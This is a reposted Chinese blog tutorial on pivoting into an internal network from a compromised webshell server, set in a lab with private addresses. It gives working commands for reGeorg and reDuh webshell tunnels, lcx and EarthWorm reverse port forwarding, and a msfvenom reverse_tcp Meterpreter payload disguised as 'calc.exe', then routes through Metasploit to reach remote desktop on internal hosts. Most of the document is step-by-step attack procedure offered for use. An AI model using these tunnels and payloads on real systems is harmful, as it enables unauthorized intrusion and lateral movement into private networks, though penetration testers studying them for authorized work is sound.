内网渗透

当渗透遇到webshell机器为内网ip可以这样做

字号+ 作者:duolaoa 来源:转载 2018-03-21 11:25 我要评论( )

在我们进行内网渗透中,经常会遇到一些蛋疼的环境问题,比如webshell所在的机器处于内网之中,这时候想要对目标机内网进行渗透就会遇到一系列的问题.比如我如何用扫描......

知识预热:内网代理

在我们进行内网渗透中,经常会遇到一些蛋疼的环境问题,比如webshell所在的机器处于内网之中,这时候想要对目标机内网进行渗透就会遇到一系列的问题.比如我如何用扫描器扫对方的内网?我没公网IP如何远程登录对方内网主机?我在这里做一个小小的整理,介绍一些内网环境和对应工具的使用。

实验环境

  • 攻击者机器

Win10(192.168.0.110)

Kali2(192.168.174.197)

  • 服务器

Win2008(192.168.174.192)

  • 个人pc

Win7(192.168.174.200)

代理工具

Regeorg

上传tunnel.php192.168.174.192网站目录下

http://192.168.174.192/tunnel.php

脚本正常运行如下图:

 

有时候出现报错,可以使用tunnel.nosocket.php

192.168.0.110上启用本地代理,命令如下:

python reGeorgSocksProxy.py -p 1234 -u http://192.168.174.192/tunnel.php

如下图:

此时可以通过192.168.0.110127.0.0.1:1234代理访问192.168.174.192/24网络的全部端口,通过regeorg工具,将远程桌面连接的代理设置为127.0.0.1:1234,如下图:

使用127.0.0.1:1234代理访问192.168.174.2003389,如下图:

如果攻击者机器是linux,可以使用proxychains代替proxifier

reDuh

上传reDuh.php192.168.174.192网站目录下

http://192.168.174.192/reDuh.php

脚本正常运行如下图:

运行gui工具,将192.168.174.200:3389代理到本地127.0.0.1:4444,如下图所示:

使用远程桌面连接工具连接127.0.0.1:4444,即可访问192.168.174.200:3389,如下图:

Lcx

上传lcx.exe192.168.0.110(必须公网ip)的目录下,执行

Lcx.exe –listen5115 33891

5115端口监听流量并转发到33891端口,如下图:

上传lcx.exe192.168.174.192目录下,执行

lcx.exe -slave192.168.0.110 5115 192.168.174.200 3389 

192.168.174.2003389流量转发到192.168.0.110(必须公网ip)上,如下图:

此时攻击者机器与个人pc建立连接,如下图:

使用远程桌面连接工具连接127.0.0.1:33981端口,即可远程访问192.168.174.200:3389,如下图:

Ew

上传ew.exe192.168.0.110(必须是公网ip)的目录下,执行

ew -s rcsocks-l1234 -e 8888

192.168.0.110上添加转接隧道,将1234 收到的代理请求转交给反连 8888 端口的主机,如下图:

上传ew.exe192.168.174.192目录下,执行

ew -s rssocks -d192.168.0.110 -e 8888    

192.168.174.192的流量反向连接到192.168.0.110上,如下图:

此时192.168.0.110上回出现连接建立成功字样,如下图:

使用regeorg工具将远程桌面连接的代理设置为127.0.0.1:1234,即可访问192.168.174.2003389,如下图:

Msf

使用msfvenom生成反向连接exe程序,反向连接的目的机器为192.168.174.197(必须是公网ip),命令如下:

msfvenom-pwindows/x64/meterpreter/reverse_tcp lhost=192.168.174.197 lport=4444 -f exe > calc.exe

同时启动msf监听流量并进行如下配置,如下图:

将反向连接程序calc.exe上传到192.168.174.192上,并执行,此时msf会完成回话连接,如下图:

192.168.174.192/24路由添加到msf中,如下图:

msf上建立socks4a代理,代理监听的默认端口是1080,配置如下图:

使用profixier工具,将远程桌面连接的工具的代理设置为192.168.174.197:1080,如下图:

192.168.0.110上即可通过远程桌面连接工具访问192.168.174.200:3389,如下图:

备注

除开以上5种还有ssh隧道、远控、teamviewertunna(不太稳定)等,可以根据实际情况进行利用或者测试。


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Intranet/674.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 看我如何利用神器进行内网大检查-巡风扫描器

    看我如何利用神器进行内网大检查-巡风扫描器

    2018-03-21 10:45

  • 组合利用AdminSDHolder和SDProp打造隐蔽域控后门

    组合利用AdminSDHolder和SDProp打造隐蔽域控后门

    2017-07-04 09:40

  • 内网渗透小计之dns欺骗配合Msf渗透Windows全过程

    内网渗透小计之dns欺骗配合Msf渗透Windows全过程

    2017-03-09 14:01

  • 内网如何定位管理员

    内网如何定位管理员

    2016-12-27 10:14

网友点评
暂时未开启评论功能~